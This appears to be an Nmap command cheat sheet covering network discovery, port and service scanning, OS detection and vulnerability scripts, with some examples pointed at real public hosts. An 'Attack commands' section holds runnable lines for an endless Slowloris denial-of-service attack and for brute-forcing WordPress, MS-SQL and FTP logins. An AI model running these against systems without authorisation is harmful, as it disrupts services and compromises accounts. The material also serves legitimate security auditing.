# NMAP 

!!! quote "About"
        Nmap ("Network Mapper") is a free and open source (license) utility for network discovery and security auditing.

        Source: [https://nmap.org/](https://nmap.org/)

## Basic scan
```
nmap 192.168.1.10
nmap localhost
```

---

## Scan IP or IP-ranges
```
nmap -p 8.8.8.0/28
nmap 8.8.8.1-14
nmap -p 8.8.8.* --exclude 8.8.8.1

nmap -v -sn 192.168.1.5/24		# scaning network for enabled hosts
```

## Scan ports
```
nmap -p 1-65535 localhost
nmap -p 80,443 8.8.8.8
nmap --top-ports 20 192.168.1.106  #number {20} of most popular ports
```

---

## Scan reading from text file
```
nmap -iL list.txt

list.txt
*******
192.168.1.10
cloudflare.com
microsoft.com
securitytrails.com
*******
```

---

## Save scan result to file
```
nmap -oN output.txt 192.168.1.10
```

---

## Disabling DNS name resolution
```
nmap -p 80 -n 8.8.8.8
```

---

## Scan + OS and service detection with fast execution
```
nmap -A -T4 cloudflare.com
sudo nmap -v -Pn -O 192.168.1.10	//OS detection
```

---

## Detect service versions
```
nmap -sV localhost
```

---

## Scan using TCP or UDP protocols
```
nmap -sT 192.168.1.1
nmap -sU localhost
```

---

## CVE detection using Nmap
```
nmap -Pn --script vuln 192.168.1.105		# scaning to attacks
```

---

## Attack commands
```
Start DOS attack
nmap 192.168.1.105 -max-parallelism 800 -Pn --script http-slowloris --script-args http-slowloris.runforever=true

Launching brute force attacks for WordPress, MSSQL, and FTP server

WordPress brute force attack:
#nmap -sV --script http-wordpress-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-wordpress-brute.hostname=domain.com, http-wordpress-brute.threads=3,brute.firstonly=true' 192.168.1.105

Brute force attack against MS-SQL:
#nmap -p 1433 --script ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt 192.168.1.105

FTP brute force attack:
#nmap --script ftp-brute -p 21 192.168.1.105

Detecting malware infections on remote hosts

A common malware scan can be performed by using:
nmap -sV --script=http-malware-host 192.168.1.105

Or using Google’s Malware check:
nmap -p80 --script http-google-malware infectedsite.com
```


## Readme
[securitytrails.com](https://securitytrails.com/blog/top-15-nmap-commands-to-scan-remote-hosts)